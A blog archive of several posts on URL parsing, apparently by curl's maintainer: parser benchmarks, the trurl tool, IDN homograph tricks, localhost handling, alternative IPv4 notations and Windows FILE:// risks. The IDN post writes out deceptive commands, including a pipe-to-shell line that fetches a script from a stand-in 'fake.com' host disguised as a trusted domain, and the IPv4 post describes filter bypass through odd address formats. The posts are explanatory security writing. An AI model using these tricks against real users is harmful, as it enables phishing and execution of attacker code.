Tag Archives: URL

URL parser performance

URLs is a dear subject of mine on this blog, as readers might have noticed.

“URL” is this mythical concept of a string that identifies a resource online and yet there is no established standard for its syntax. There are instead multiple ones out of which one is on purpose “moving” so it never actually makes up its mind but instead keeps changing.

This then leads to there being basically no two URL parsers that treat URLs the same, to the extent that mixing parsers is considered a security risk.

The standards

The browsers have established their WHATWG URL Specification as a “living document”, saying how browsers should parse URLs, gradually taking steps away from the earlier established RFC 3986 and RFC 3987 attempts.

The WHATWG standard keeps changing and the world that tries to stick to RFC 3986 still needs to sometimes get and adapt to WHATWG influences in order to interoperate with the browser-centric part of the web. It leaves URL parsing and “URL syntax” everywhere in a sorry state.

curl

In the curl project we decided in 2018 to help mitigate the mixed URL parser problem by adding a URL parser API so that applications that use libcurl can use the same parser for all its URL parser needs and thus avoid the dangerous mixing part.

The libcurl API for this purpose is designed to let users parse URLs, to extract individual components, to set/change individual components and finally to extract a normalized URL if wanted. Including some URL encoding/decoding and IDN support.

trurl

Thanks to the availability and functionality of the public libcurl URL API, we could build and ship the separate trurl tool earlier this year.

Ada

Some time ago I was made aware of an effort to (primarily) write a new URL parser for node js – although the parser is stand-alone and can be used by anyone else who wants to: The Ada URL Parser. The two primary developers behind this effort, Yagiz Nizipli and Daniel Lemire figured out that node does a large amount of URL parsing so by speeding up this parser alone it would apparently have a general performance impact.

Ada is C++ project designed to parse WHATWG URLs and the first time I was in contact with Yagiz he of course mentioned how much faster their parser is compared to curl’s.

You can also see them reproduce and talk about these numbers on this node js conference presentation.

Benchmarks

Everyone who ever tried to write code faster than some other code has found themselves in a position where they need to compare. To benchmark one code set against the other. Benchmarking is an art that is close to statistics and marketing: very hard to do without letting your own biases or presumptions affect the outcome.

Speed vs the rest

After I first spoke with Yagiz, I did go back to the libcurl code to see what obvious mistakes I had done and what low hanging fruit there was to pick in order to speed things up a little. I found a few flaws that maybe did a minor difference, but in my view there are several other properties of the API that is actually more important than sheer speed:

  • non-breaking API and ABI
  • readable and maintainable code
  • sensible and consistent API
  • error codes that help users understand what the problem is

Of course, there is also the thing that if you first figure out how to parse a URL the fastest way, maybe you can work out a smoother API that works better with that parsing approach. That’s not how I went about when creating the libcurl API.

If we can maintain those properties mentioned above, I still want the parser to run as fast as possible. There is no point in being slower than necessary.

URLs vs URLs

Ada parses WHATWG URLs and libcurl parses RFC 3986 URLs. They parse URLs differently and provide different feature sets. They are not interchangeable.

In Ada’s benchmarks they have ignored the parser differences. Throw the parsers against each other, and according to all their public data since early 2023 their parser is 7-8 times faster.

700% faster really?

So how on earth can you make such a simple thing as URL parsing 700% faster? It never sat right with me when they claimed those numbers but since I had not compared them myself I trusted them. After all, they should be fairly easy to compare and they seemed clueful enough.

Until recently when I decided to reproduce their claims and see how much their numbers depends on their specific choices of URLs to parse. It taught me something.

Reproduce the numbers

In my tests, their parser is fast. It is clearly faster than the libcurl parser, and I too of course ignored the parser results since they would not be comparable anyway.

In my tests on my development machine, Ada is 1.25 – 1.8 times faster than libcurl. There is no doubt Ada is faster, just far away from the enormous difference they claim. How come?

  1. You use the input data that most favorably shows a difference
  2. You run the benchmark on a hardware for which your parser has magic hardware acceleration

I run a decently modern 13th gen Intel Core-I7 i7-13700K CPU in my development machine. It’s really fast, especially on single-thread stuff like this. On my machine, the Ada parser can parse more URLs/second than even the Ada people themselves claim, which just tells us they used slower machines to test on. Nothing wrong with that.

The Ada parser has code that is using platform specific instructions on some environments and the benchmark they decide to use when boasting about their parser was done on such a platform. An Apple m1 CPU to be specific. In most aspects except performance per watt, not a speed monster CPU.

In itself this is not wrong, but maybe a little misleading as this is far from clearly communicated.

I have a script, urlgen. that generates URLs in as many combinations as possible so that the parser’s every corner and angle are suitably exercised and verified. Many of those combination therefor illegal in subtle ways. This is the set of URLs I have thrown at the curl parser mostly, which then also might explain why this test data is the set that makes Ada least favorable (at 1.26 x the libcurl speed). Again: their parser is faster, no doubt. I have not found a test case that does not show it running faster than libcurl’s parser.

A small part of the explanation of how they are faster is of course that they do not provide the result, the individual components, in their own separately allocated strings.

Here’s a separate detailed document how I compared.

More mistakes

They also repeatably insist curl does not handle International Domain Names (IDN) correctly, which I simply cannot understand and I have not got any explanation for. curl has handled IDN since 2004. I’m guessing a mistake, an old bug or that they used a curl build without IDN support.

Size

I would think a primary argument against using Ada vs libcurl’s parser is its size and code. Not that I believe that there are many situations where users are actually selecting between these two.

Ada header and source files are 22,774 lines of C++

libcurl URL API header and source files are 2,103 lines of C.

Comparing the code sizes like this is a little unfair since Ada has its own IDN management code included, which libcurl does not, and that part comes with several huge tables and more.

Improving libcurl?

I am sure there is more that can be done to speed up the libcurl URL parser, but there is also the case of diminishing returns. I think it is pretty fast already. On Ada’s test case using 100K URLs from Wikipedia, libcurl parses them at an average of 178 nanoseconds per URL on my machine. More than 5.6 million real world URLs parsed per second per core.

This, while also storing each URL component in a separate allocation after each parse, and also returning an error code that helps identifying the problem if the URL fails to parse. With an established and well-documented API that has been working since 2018 .

The hardware specific magic Ada uses can possibly be used by libcurl too. Maybe someone can try that out one day.

I think we have other areas in libcurl where work and effort are better spent right now.

trurl manipulates URLs

trurl is a tool in a similar spirit of tr but for URLs. Here, tr stands for translate or transpose.

trurl is a small command line tool that parses and manipulates URLs, designed to help shell script authors everywhere.

URLs are tricky to parse and there are numerous security problems in software because of this. trurl wants to help soften this problem by taking away the need for script and command line authors everywhere to re-invent the wheel over and over.

trurl uses libcurl’s URL parser and will thus parse and understand URLs exactly the same as curl the command line tool does – making it the perfect companion tool.

I created trurl on March 31, 2023.

Some command line examples

Given just a URL (even without scheme), it will parse it and output a normalized version:

$ trurl ex%61mple.com/
http://example.com/

The above command will guess on a http:// scheme when none was provided. The guess has basic heuristics, like for example FTP server host names often starts with ftp:

$ trurl ftp.ex%61mple.com/
ftp://ftp.example.com/

A user can output selected components of a provided URL. Like if you only want to extract the path or the query components from it.:

$ trurl https://curl.se/?search=foobar --get '{path}'
/

Or both (with extra text intermixed):

$ trurl https://curl.se/?search=foobar --get 'p: {path} q: {query}'
p: / q: search=foobar

A user can create a URL by providing the different components one by one and trurl outputs the URL:

$ trurl --set scheme=https --set host=fool.wrong
https://fool.wrong/

Reset a specific previously populated component by setting it to nothing. Like if you want to clear the user component:

$ trurl https://daniel@curl.se/--set user=
https://curl.se/

trurl tells you the full new URL when the first URL is redirected to a second relative URL:

$ trurl https://curl.se/we/are/here.html --redirect "../next.html"
https://curl.se/we/next.html

trurl provides easy-to-use options for adding new segments to a URL’s path and query components. Not always easily done in shell scripts:

$ trurl https://curl.se/we/are --append path=index.html
https://curl.se/we/are/index.html
$ trurl https://curl.se?info=yes --append query=user=loggedin
https://curl.se/?info=yes&user=loggedin

trurl can work on a single URL or any amount of URLs passed on to it. The modifications and extractions are then performed on them all, one by one.

$ trurl https://curl.se localhost example.com 
https://curl.se/
http://localhost/
http://example.com/

trurl can read URLs to work on off a file or from stdin, and works on them in a streaming fashion suitable for filters etc.

$ cat many-urls.yxy | trurl --url-file -
...

More or different

trurl was born just a few days ago, this is what we have made it do so far. There is a high probability that it will change further going forward before it settles on exactly how things ideally should work.

It also means that we are extra open for and welcoming to feedback, ideas and pull-requests. With some luck, this could become a new everyday tool for all of us.

Tell us on GitHub!

IDN is crazy

IDN, International Domain Names, is the concept that lets us register and use international characters in domain names, and by international we of course mean characters outside of the ASCII range.

Recently I have fought some battles against IDN and IDN decoding so I felt this urge to write a lot of words about it to help me in my healing process and maybe mend my scars a little. I am not sure it worked but at least I feel a little better now.

(If WordPress had a more sensible Unicode handling, this post would have nicer looking examples. I can enter Unicode fine, but if I save the post as a draft and come back to it later, most of the Unicodes are replaced by question marks! Because of this, the examples below are not all using the exact Unicode symbols the text speaks of.)

Punycode

IDN works by having apps convert the Unicode name into the ASCII based punycode version under the hood, and then use that with DNS etc. The puny code version of “räksmörgås.se” becomes “xn--rksmrgs-5wao1o.se“. A pretty clever solution really.

The good side

Using this method, we can use URLs like https://räksmörgås.se or even ones written entirely in Arabic, Chinese or Cyrillic etc in compliant applications like browsers and curl. Even the TLD can be “international”. The whole Unicode range is at our disposal and this is certainly a powerful tool and allows a lot of non-Latin based languages to actually be used for domain names.

Gone are the days when everything needed to be converted to Latin.

There are many ugly sides

Already from the start of the IDN adventure, people realized that Unicode contains a lot of symbols that are identical or almost identical to other symbols, so you can make up the perfect fake sites that provide no or very little visual distinction from the one you try to look like.

Homographs

I remember early demonstrations using paypal.com vs paypal.com, where the second name was actually using a completely different letter somewhere. Perhaps for example the ‘l’ used the Cyrillic Capital Letter Iota (U+A646) – which in most fonts is next to indistinguishable from the lower case ASCII letter L. This is commonly referred to as an IDN Homograph attack. They look identical, but are different.

This concept of replacing one or more characters by identical glyphs is mitigated in part in browsers, which switch to showing the punycode version in the URL bar instead of the Unicode version – when they think it is mandated. Domain names are not allowed to mix scripts for different languages, and if they do the IDNs names are displayed using their punycode.

This of course does not prevent someone from promoting a command line curl use that uses it, and maybe encourage use of it:

curl https://example.com/api/

If you would copy and paste such an example, you would find that curl cannot resolve xn--exampe-7r6v.com! Or if you use the same symbol in the curl domain name:

$ curl https://curl.se
curl: (6) Could not resolve host: xn--cur-ju2l.se

Heterograph?

Similar to the previous confusion, there’s another version of the homograph attack and this is one that stayed under the radar for me for a long time. I suppose we can call it a Heterograph attack, as it makes names look different when they are in fact the same.

The IDN system is also “helpfully” replacing some similarly looking glyphs with their ASCII counterparts. I use quotes around helpfully, because I truly believe that this generally causes more harm and pain in users’ lives than it actually does good.

A user can provide a name using an IDN version of one or more characters within the name, and that name will then get translated into a regular non-IDN name and then get used normally from then on. I realize this may sound complicated, but it really is not.

Let me show you a somewhat crazy example (shown as an image to prevent WordPress from interfering). You want to use a curl command line to get the contents of the URL https://curl.se but since you are wild and crazy, you spice up things and replace every character in the domain name with a Unicode replacement:

If you would copy and paste this command line into your terminal, it works. Everyone can see that this domain name looks crazy, but it does not matter. It still works. It also works in browsers. A browser will however immediately show the translated version in the URL bar.

This method can be used for avoiding filters and has several times been used to find flaws in curl’s HSTS handling. Surely other tools can be tricked and fooled using variations of this as well.

This works because the characters used in the domain name are automatically converted to their ASCII counterparts by the IDN function. And since there is no IDN characters left after the conversion, it does not end up punycoded but instead it is plain old ASCII again. Those Unicode symbols simply translate into “curl.se”.

The example above also replaces the period before “se” with the Halfwidth Ideographic Full Stop (U+FF61).

Replacing the dot this way works as well. “Helpful”.

A large set to pick from

If we look at the letter ‘c’ alone, it has a huge number of variations in the Unicode set that all translate into ASCII ‘c’ by the IDN conversion. I found at least these fifteen variations that all convert to c:

  • Fullwidth Latin Small Letter C (U+FF43)
  • Modifier Letter Small C (U+1D9C)
  • Small Roman Numeral One Hundred (U+217D)
  • Mathematical Bold Small C (U+1D41C)
  • Mathematical Italic Small C (U+1D450)
  • Mathematical Bold Italic Small C (U+1D484)
  • Mathematical Script Small C (U+1D4B8)
  • Mathematical Fraktur Small C (U+1D520)
  • Mathematical Double-Struck Small C (U+1D554)
  • Mathematical Bold Fraktur Small C (U+1D588)
  • Mathematical Sans-Serif Small C (U+1D5BC)
  • Mathematical Sans-Serif Bold Small C (U+1D5F0)
  • Mathematical Sans-Serif Italic Small C (U+1D624)
  • Mathematical Sans-Serif Bold Italic Small C (U+1D658)
  • Mathematical Monospace Small C (U+1D68C)

The Unicode consortium even has this collection of “confusables” which also features a tool that lets you visualize a name done with various combinations of Unicode homographs. I entered curl, and here’s a subset of the alternatives it showed me:

Supposedly, all of those combinations can be used as IDN names and they will work.

Homographic slash

The Fraction Slash (U+2044) looks very much like an ASCII slash, but is not. Use it instead of a slash to make the URL look like host name with a slash, but then add your own domain name after it:

$ curl https://google.com/.curl.se
curl: (6) Could not resolve host: google.xn--com-qt0a.curl.se

If you paste that URL into a browser, it will switch to punycode mode, but still. The next example also shows as punycode when I try it in Firefox.

Homographic question mark

If you want an alternative to the slash-looking non-slash symbol, you can also trick a user with something that looks similar to a question mark. The Latin Capital Letter Glottal Stop (U+0241) for example is a symbol that looks confusingly similar to a question mark in many fonts:

$ curl https://google.com?.curl.se
curl: (6) Could not resolve host: google.xn--com-sqb.curl.se

In both the slash and these question mark examples, I could of course set up a host that would have some clever content.

Homographic fragment

The Viewdata Square (U+2317) can be used to mimic a hash symbol.

$ curl https://trusted.com#.fake.com
curl: (6) Could not resolve host: trusted.xn--com-d62a.fake.com

Percent encode the thing

It can look even weirder if you combine the above tricks and then percent-encode the UTF-8 bytes. This thing below still ends up “https://curl.se”:

$ curl "https://%e2%84%82%e1%b5%a4%e2%93%87%e2%84%92%e3%80%82%f0%9d%90%92%f0%9f%84%b4"

That URL of course also works fine to paste into a browser’s URL bar.

Zero Width space

Unicode offers this fun “symbol” that is literally nothing. It is a zero width space (U+200B). The IDN handling also recognizes this and will remove any such in the process. This means that you can add one or more zero width spaces to any domain in a URL and the domain will still work and end up being the original one. The UTF-8 sequence for this is %e2%80%8b when expressed percent encoded.

Instead of using curl.se you can thus use cu%e2%80%8brl.se. Or even cu%e2%80%8brl.s%e2%80%8be!

$ curl https://cu%e2%80%8brl.s%e2%80%8be

Tricking a curl user

curl users will not get the punycode version shown in a URL bar so we might be easier to fool by these stunts. If the user doesn’t carefully check perhaps the verbose output, they might very well be fooled.

HTTPS does not save us either, because nothing prevents an impostor from creating this domain name and having a perfectly valid certificate for it.

A really sneaky command line to trick users to download something from a site fake site, while appearing to download from a known and trusted one can look like this:

$ curl https://trusted.com?.fake.com/file -O

… but since the question mark on the right side of ‘com’ is a Unicode symbol, and the curl tool supports IDN, it actually gets a page from “fake.com”, As owner of fake.com, we would only need to make sure that https://trusted.xn--com-qt0a.fake.com exists and works.

A real world attack could even have a redirect to the real trusted.com domain for 99% of the cases or maybe for all cases where the user agent or source IP are not the ones we are looking for.

The old pipe from curl to shell thing is of course also an effective trick. It looks like you get the script from trusted.com using HTTPS and everything:

$ curl https://trusted.com?.fake.com/script | sh

More

This blog post is not meant to be a conclusive list of all problems or possible IDN trickery you can play with. I hear for example that mixing right-to-left with left-to-right in the same domain name is another treasure trove of confusions ready for your further explorations.

Game on!

Mitigations

People have mentioned it as comments to this: all registrars may not allow you to register domains containing specific Unicode symbols. In the past we have however seen that some TLDs are more liberal. Also, what I mention above are mostly tricks you can do without registering a new domain.

ICANN presumably has rules against use of emojis etc when creating new TLDs.

Discuss

Hacker news.

http://http://http://@http://http://?http://#http://

The other day I sent out this tweet

"http://http://http://@http://http://?http://#http://"

is a legitimate URL

As it took off, got an amazing attention and I received many different comments and replies, I felt a need to elaborate a little. To add some meat to this.

Is this string really a legitimate URL? What is a URL? How is it parsed?

http://http://http://@http://http://?http://#http://

curl

Let’s start with curl. It parses the string as a valid URL and it does it like this. I have color coded the sections below a bit to help illustrate:

http://http://http://@http://http://?http://#http://

Going from left to right.

http – the scheme of the URL. This speaks HTTP. The “://” separates the scheme from the following authority part (that’s basically everything up to the path).

http – the user name up to the first colon

//http:// – the password up to the at-sign (@)

http: – the host name, with a trailing colon. The colon is a port number separator, but a missing number will be treated by curl as the default number. Browsers also treat missing port numbers like this. The default port number for the http scheme is 80.

//http:// – the path. Multiple leading slashes are fine, and so is using a colon in the path. It ends at the question mark separator (?).

http:// – the query part. To the right of the question mark, but before the hash (#).

http:// – the fragment, also known as “anchor”. Everything to the right of the hash sign (#).

To use this URL with curl and serve it on your localhost try this command line:

curl "http://http://http://@http://http://?http://#http://" --resolve http:80:127.0.0.1

The curl parser

The curl parser has been around for decades already and do not break existing scripts and applications is one of our core principles. Thus, some of the choices in the URL parser we did a long time ago and we stand by them, even if they might be slightly questionable standards wise. As if any standard meant much here.

The curl parser started its life as lenient as it could possibly be. While it has been made stricter over the years, traces of the original design still shows. In addition to that, we have also felt that we have been forced to make adaptions to the parser to make it work with real world URLs thrown at it. URLs that maybe once was not deemed fine, but that have become “fine” because they are accepted in other tools and perhaps primarily in browsers.

URL standards

I have mentioned it many times before. What we all colloquially refer to as a URL is not something that has a firm definition:

There is the URI (not URL!) definition from IETF RFC 3986, there is the WHATWG URL Specification that browsers (try to) adhere to and there are numerous different implementations of parsers being more or less strict when following one or both of the above mentioned specifications.

You will find that when you scrutinize them into the details, hardly any two URL parsers agree on every little character.

Therefore, if you throw the above mentioned URL on any random URL parser they may reject it (like the Twitter parser didn’t seem to think it was a URL) or they might come to a different conclusion about the different parts than curl does. In fact, it is likely that they will not do exactly as curl does.

Python’s urllib

April King threw it at Python’s urllib. A valid URL! While it accepted it as a URL, it split it differently:

ParseResult(scheme='http',
            netloc='http:',
            path='//http://@http://http://',
            params='',
            query='http://',
            fragment='http://')

Given the replies to my tweet, several other parsers did the similar interpretation. Possibly because they use the same underlying parser…

Javacript

Meduz showed how the JavaScript URL object treats it, and it looks quite similar to the Python above. Still a valid URL.

Firefox and Chrome

I added the host entry ‘127.0.0.1 http‘ into /etc/hosts and pasted the URL into the address bar of Firefox. It rewrote it to

http://http//http://@http://http://?http://#http://

(the second colon from the left is removed, everything else is the same)

… but still considered it a valid URL and showed the contents from my web server.

Chrome behaved exactly the same. A valid URL according to it, and a rewrite of the URL like Firefox does.

RFC 3986

Some commenters mentioned that the unencoded “unreserved” letters in the authority part make it not RFC 3986 compliant. Section 3.2 says:

The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI.

Meaning that the password should have its slashes URL-encoded as %2f to make it valid. At least. So maybe not a valid URL?

Update: it actually still qualifies as “valid”, it just is parsed a little differently than how curl does it. I do not think there is any question that curl’s interpretation is not matching RFC 3986.

HTTPS

The URL works equally fine with https.

https://https://https://@https://https://?https://#https://

The two reasons I did not use https in the tweet:

  1. It made it 7 characters longer for no obvious extra fun
  2. It is harder to prove working by serving your own content as you would need curl -k or similar to make the host name ‘https’ be OK vs the name used in the actual server you would target.

The URL Buffalo buffalo

A surprisingly large number of people thought it reminded them of the old buffalo buffalo thing.

Don’t mix URL parsers

I have had my share of adventures with URL parsers and their differences in the past. The current state of my research on the topic of (failed) URL interoperability remains available in this GitHub document.

Use one and only one

There is still no common or standard URL syntax format in sight. A string that you think looks like a URL passed to one URL parser might be considered fine, but passed to a second parser it might be rejected or get interpreted differently. I believe the state of URLs in the wild has never before been this poor.

The problem

If you parse a URL with parser A and make conclusions about the URL based on that, and then pass the exact same URL to parser B and it draws different conclusions and properties from that, it opens up not only for strange behaviors but in some cases for downright security vulnerabilities.

This is easily done when you for example use two different libraries, frameworks or libraries that need to work on that URL, but the repercussions are not always easy to see at once.

A well-known presentation on this topic from 2017 is Orange Tsai’s A New Era Of SSRF – Exploiting Url Parsers.

URL Parsing Confusion

The report EXPLOITING URL PARSERS: THE GOOD, BAD, AND INCONSISTENT (by Noam Moshe, Sharon Brizinov, Raul Onitza-Klugman and Kirill Efimov) was published today and I have had the privilege to have read and worked with the authors a little on this prior to its release.

As you see in the report, it shows that problems very similar to those mr Tsai reported and exploited back in 2017 are still present today, although perhaps in slightly different ways.

As the report shows, the problem is not only that there are different URL standards and that every implementation provides a parser that is somewhere in between both specs, but on top of that, several implementations often do not even follow the existing conflicting specifications!

The report authors also found and reported a bug in curl’s URL parser (involving percent encoded octets in host names) which I’ve subsequently fixed so if you use the latest curl that one isn’t present anymore.

curl’s URL API

In the curl project we attempt to help applications and authors to reduce the number of needed URL parsers in any given situation – to a large part as a reaction to the Tsai presentation from 2017 – with the URL API we introduced for libcurl in 2018.

Thanks to this URL parser API, if you are already using libcurl for transfers, it is easy to also parse and treat URLs elsewhere exactly the same way libcurl does. By sticking to the same parser, there is a significantly smaller risk that repeated parsing bring surprises.

Other work-arounds

If your application uses different languages or frameworks, another work-around to lower the risk that URL parsing differences will hurt you, is to use a single parser to extract the URL components you need in one place and then work on the individual components from that point on. Instead of passing around the full URL to get parsed multiple times, you can pass around the already separated URL parts.

Future

I am not aware of any present ongoing work on consolidating the URL specifications. I am not even aware of anyone particularly interested in working on it. It is an infected area, and I will get my share of blow-back again now by writing my own view of the state.

The WHATWG probably say they would like to be the steward of this and they are generally keen on working with URLs from a browser standpoint. It limits them to a small number of protocol schemes and from my experience, getting them to interested in changing something for the the sake of aligning with RFC 3986 parsers is hard. This is however the team that more than any other have moved furthest away from the standard we once had established. There are also strong anti-IETF sentiments oozing there. The WHATWG spec is a “living specification” which means it continues to change and drift away over time.

The IETF published RFC 3986 back in 2005, they saw the RFC 3987 pretty much fail and then more or less gave up on URLs. I know there are people and working groups there who would like to see URLs get brought back to the agenda (as I’ve talked to a few of them over the years) and many IETFers think that the IETF is the only group that can do it proper, but due to the unavoidable politics and the almost certain collision course against (and cooperation problems with) WHATWG, it is considered a very hot potato that barely anyone wants to hold. There are also strong anti-WHATWG feelings in some areas of the IETF. There is just a too small of a chance of a successful outcome from something that mostly likely will take a lot of effort, will, thick skin and backing from several very big companies.

We are stuck here. I foresee yet another report to be written a few years down the line that shows more and new URL problems.

My URL isn’t your URL.

curl localhost as a local host

When you use the name localhost in a URL, what does it mean? Where does the network traffic go when you ask curl to download http://localhost ?

Is “localhost” just a name like any other or do you think it infers speaking to your local host on a loopback address?

Previously

curl http://localhost

The name was “resolved” using the standard resolver mechanism into one or more IP addresses and then curl connected to the first one that works and gets the data from there.

The (default) resolving phase there involves asking the getaddrinfo() function about the name. In many systems, it will return the IP address(es) specified in /etc/hosts for the name. In some systems things are a bit more unusually setup and causes a DNS query get sent out over the network to answer the question.

In other words: localhost was not really special and using this name in a URL worked just like any other name in curl. In most cases in most systems it would resolve to 127.0.0.1 and ::1 just fine, but in some cases it would mean something completely different. Often as a complete surprise to the user…

Starting now

curl http://localhost

Starting in commit 1a0ebf6632f8, to be released in curl 7.78.0, curl now treats the host name “localhost” specially and will use an internal “hard-coded” set of addresses for it – the ones we typically use for the loopback device: 127.0.0.1 and ::1. It cannot be modified by /etc/hosts and it cannot be accidentally or deliberately tricked by DNS resolves. localhost will now always resolve to a local address!

Does that kind of mistakes or modifications really happen? Yes they do. We’ve seen it and you can find other projects report it as well.

Who knows, it might even be a few microseconds faster than doing the “full” resolve call.

(You can still build curl without IPv6 support at will and on systems without support, for which the ::1 address of course will not be provided for localhost.)

Specs say we can

The RFC 6761 is titled Special-Use Domain Names and in its section 6.3 it especially allows or even encourages this:

Users are free to use localhost names as they would any other domain names.  Users may assume that IPv4 and IPv6 address queries for localhost names will always resolve to the respective IP loopback address.

Followed by

Name resolution APIs and libraries SHOULD recognize localhost names as special and SHOULD always return the IP loopback address for address queries and negative responses for all other query types. Name resolution APIs SHOULD NOT send queries for localhost names to their configured caching DNS server(s).

Mike West at Google also once filed an I-D with even stronger wording suggesting we should always let localhost be local. That wasn’t ever turned into an RFC though but shows a mindset.

(Some) Browsers do it

Chrome has been special-casing localhost this way since 2017, as can be seen in this commit and I think we can safely assume that the other browsers built on their foundation also do this.

Firefox landed their corresponding change during the fall of 2020, as recorded in this bugzilla entry.

Safari (on macOS at least) does however not do this. It rather follows what /etc/hosts says (and presumably DNS of not present in there). I’ve not found any official position on the matter, but I found this source code comment indicating that localhost resolving might change at some point:

// FIXME: Ensure that localhost resolves to the loopback address.

Windows (kind of) does it

Since some time back, Windows already resolves “localhost” internally and it is not present in their /etc/hosts alternative. I believe it is more of a hybrid solution though as I believe you can put localhost into that file and then have that custom address get used for the name.

Secure over http://localhost

When we know for sure that http://localhost is indeed a secure context (that’s a browser term I’m borrowing, sorry), we can follow the example of the browsers and for example curl should be able to start considering cookies with the “secure” property to be dealt with over this host even when done over plain HTTP. Previously, secure in that regard has always just meant HTTPS.

This change in cookie handling has not happened in curl yet, but with localhost being truly local, it seems like an improvement we can proceed with.

Can you still trick curl?

When I mentioned this change proposal on twitter two of the most common questions in response were

  1. can’t you still trick curl by routing 127.0.0.1 somewhere else
  2. can you still use --resolve to “move” localhost?

The answers to both questions are yes.

You can of course commit the most hideous hacks to your system and reroute traffic to 127.0.0.1 somewhere else if you really wanted to. But I’ve never seen or heard of anyone doing it, and it certainly will not be done by mistake. But then you can also just rebuild your curl/libcurl and insert another address than the default as “hardcoded” and it’ll behave even weirder. It’s all just software, we can make it do anything.

The --resolve option is this magic thing to redirect curl operations from the given host to another custom address. It also works for localhost, since curl will check the cache before the internal resolve and --resolve populates the DNS cache with the given entries. (Provided to applications via the CURLOPT_RESOLVE option.)

What will break?

With enough number of users, every single little modification or even improvement is likely to trigger something unexpected and undesired on at least one system somewhere. I don’t think this change is an exception. I fully expect this to cause someone to shake their fist in the sky.

However, I believe there are fairly good ways to make to restore even the most complicated use cases even after this change, even if it might take some hands on to update the script or application. I still believe this change is a general improvement for the vast majority of use cases and users. That’s also why I haven’t provided any knob or option to toggle off this behavior.

Credits

The top photo was taken by me (the symbolism being that there’s a path to take somewhere but we don’t really know where it leads or which one is the right to take…). This curl change was written by me. Mike West provided me the Chrome localhost change URL. Valentin Gosu gave me the Firefox bugzilla link.

curl those funny IPv4 addresses

Everyone knows that on most systems you can specify IPv4 addresses just 4 decimal numbers separated with periods (dots). Example:

192.168.0.1

Useful when you for example want to ping your local wifi router and similar. “ping 192.168.0.1”

Other bases

The IPv4 string is usually parsed by the inet_addr() function or at times it is passed straight into the name resolver function like getaddrinfo().

This address parser supports more ways to specify the address. You can for example specify each number using either octal or hexadecimal.

Write the numbers with zero-prefixes to have them interpreted as octal numbers:

0300.0250.0.01

Write them with 0x-prefixes to specify them in hexadecimal:

0xc0.0xa8.0x00.0x01

You will find that ping can deal with all of these.

As a 32 bit number

An IPv4 address is a 32 bit number that when written as 4 separate numbers are split in 4 parts with 8 bits represented in each number. Each separate number in “a.b.c.d” is 8 bits that combined make up the whole 32 bits. Sometimes the four parts are called quads.

The typical IPv4 address parser however handles more ways than just the 4-way split. It can also deal with the address when specified as one, two or three numbers (separated with dots unless its just one).

If given as a single number, it treats it as a single unsigned 32 bit number. The top-most eight bits stores what we “normally” with write as the first number and so on. The address shown above, if we keep it as hexadecimal would then become:

0xc0a80001

And you can of course write it in octal as well:

030052000001

and plain old decimal:

3232235521

As two numbers

If you instead write the IP address as two numbers with a dot in between, the first number is assumed to be 8 bits and the next one a 24 bit one. And you can keep on mixing the bases as you see like. The same address again, now in a hexadecimal + octal combo:

0xc0.052000001

This allows for some fun shortcuts when the 24 bit number contains a lot of zeroes. Like you can shorten “127.0.0.1” to just “127.1” and it still works and is perfectly legal.

As three numbers

Now the parts are supposed to be split up in bits like this: 8.8.16. Here’s the example address again in octal, hex and decimal:

0xc0.0250.1

Bypassing filters

All of these versions shown above work with most tools that accept IPv4 addresses and sometimes you can bypass filters and protection systems by switching to another format so that you don’t match the filters. It has previously caused problems in node and perl packages and I’m guessing numerous others. It’s a feature that is often forgotten, ignored or just not known.

It begs the question why this very liberal support was once added and allowed but I’ve not been able to figure that out – maybe because of how it matches class A/B/C networks. The support for this syntax seems to have been introduced with the inet_aton() function in the 4.2BSD release in 1983.

IPv4 in URLs

URLs have a host name in them and it can be specified as an IPv4 address.

RFC 3986

The RFC 3986 URL specification’s section 3.2.2 says an IPv4 address must be specified as:

dec-octet "." dec-octet "." dec-octet "." dec-octet

… but in reality very few clients that accept such URLs actually restrict the addresses to that format. I believe mostly because many programs will pass on the host name to a name resolving function that itself will handle the other formats.

The WHATWG URL Spec

The Host Parsing section of this spec allows the many variations of IPv4 addresses. (If you’re anything like me, you might need to read that spec section about three times or so before that’s clear).

Since the browsers all obey to this spec there’s no surprise that browsers thus all allow this kind of IP numbers in URLs they handle.

curl before

curl has traditionally been in the camp that mostly accidentally somewhat supported the “flexible” IPv4 address formats. It did this because if you built curl to use the system resolver functions (which it does by default) those system functions will handle these formats for curl. If curl was built to use c-ares (which is one of curl’s optional name resolver backends), using such address formats just made the transfer fail.

The drawback with allowing the system resolver functions to deal with the formats is that curl itself then works with the original formatted host name so things like HTTPS server certificate verification and sending Host: headers in HTTP don’t really work the way you’d want.

curl now

Starting in curl 7.77.0 (since this commit ) curl will “natively” understand these IPv4 formats and normalize them itself.

There are several benefits of doing this ourselves:

  1. Applications using the URL API will get the normalized host name out.
  2. curl will work the same independently of selected name resolver backend
  3. HTTPS works fine even when the address is using other formats
  4. HTTP virtual hosts headers get the “correct” formatted host name

Fun example command line to see if it works:

curl -L 16843009

16843009 gets normalized to 1.1.1.1 which then gets used as http://1.1.1.1 (because curl will assume HTTP for this URL when no scheme is used) which returns a 301 redirect over to https://1.1.1.1/ which -L makes curl follow…

Credits

Image by Thank you for your support Donations welcome to support from Pixabay

Warning: curl users on Windows using FILE://

The Windows operating system will automatically, and without any way for applications to disable it, try to establish a connection to another host over the network and access it (over SMB or other protocols), if only the correct file path is accessed.

When first realizing this, the curl team tried to filter out such attempts in order to protect applications for inadvertent probes of for example internal networks etc. This resulted in CVE-2019-15601 and the associated security fix.

However, we’ve since been made aware of the fact that the previous fix was far from adequate as there are several other ways to accomplish more or less the same thing: accessing a remote host over the network instead of the local file system.

The conclusion we have come to is that this is a weakness or feature in the Windows operating system itself, that we as an application and library cannot protect users against. It would just be a whack-a-mole race we don’t want to participate in. There are too many ways to do it and there’s no knob we can use to turn off the practice.

We no longer consider this to be a curl security flaw!

If you use curl or libcurl on Windows (any version), disable the use of the FILE protocol in curl or be prepared that accesses to a range of “magic paths” will potentially make your system try to access other hosts on your network. curl cannot protect you against this.

We have updated relevant curl and libcurl documentation to make users on Windows aware of what using FILE:// URLs can trigger (this commit) and posted a warning notice on the curl-library mailing list.

Previous security advisory

This was previously considered a curl security problem, as reported in CVE-2019-15601. We no longer consider that a security flaw and have updated that web page with information matching our new findings. I don’t expect any other CVE database to update since there’s no established mechanism for updating CVEs!

Credits

Many thanks to Tim Sedlmeyer who highlighted the extent of this issue for us.

libcurl gets a URL API

